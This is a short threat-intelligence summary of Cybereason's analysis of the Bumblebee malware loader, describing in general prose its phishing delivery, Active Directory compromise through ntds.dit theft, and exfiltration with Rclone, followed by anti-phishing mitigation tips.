The Cybereason Global Security Operations Center (GSOC) Team analyzed a cyberattack that involved the Bumblebee Loader. In the analysis, they detailed how attackers were able to compromise the entire network. Most Bumblebee infections started by users executing LNK files which use a system binary to load the malware. The malware is distributed through phishing messages using a malicious attachment or a link to the malicious archive containing Bumblebee.
If the victim executes malicious files, Bumblebee can be used to perform various post-exploitation actions including:
- privilege escalation
- credential theft
Threat actors were seen conducting extensive reconnaissance activities and would redirect the results of executed commands to files for exfiltration. Bumblebee has been active since March 2022 when Google’s Threat Analysis Group (TAG), spotted that cybercriminal groups that were previously using the BazaLoader and IcedID as part of their malware campaigns had switched to the Bumblebee loader.
Cybereason says the threat actors have transitioned from BazarLoader, TrickBot, and IcedID to Bumblebee. Because Bumblebee is still in active development, many threat actors have chosen it as their loader of choice. Many Bumblebee operators also use of CobaltStrike, and use stolen credentials to access Active Directory. Making a copy of ntds.dit (which contains data for the entire Active Directory), threat actors will use or create a domain admin account to move laterally, create local user accounts, and exfiltrate data using Rclone software.
Bumblebee accesses the remote Active Directory machines using Windows Management Instrumentation command-line utility (WMIC) and creates a shadow copy using vssadmin commands. As mentioned above, the threat actor also steals the ntds.dit file from the domain controller which contains information about user objects, groups and group membership. The file also stores the password hashes for all users in the domain. In many cases, the threat actors took as little as two days to move from initial access to Active directory compromise.
GSOC experts warn: attacks involving Bumblebee must be treated as critical. The attack chain they analyzed allows threat actors to deliver their ransomware in the compromised networks.
Tips for Mitigation:
Because the campaign begins with a phishing attack, users should be trained continuously to recognize phish attempts in order to avoid falling victim to social engineering threats.
- Do not open emails or download software from untrusted sources
- Do not click on links or attachments in emails that come from unknown senders
- Do not supply passwords, personal, or financial information via email to anyone (sensitive information is also used for double extortion)
- Always verify the email sender's email address, name, and domain
- Protect all devices using antivirus, anti-spam and anti-spyware software
- Report phishing emails to the organization's IT staff immediately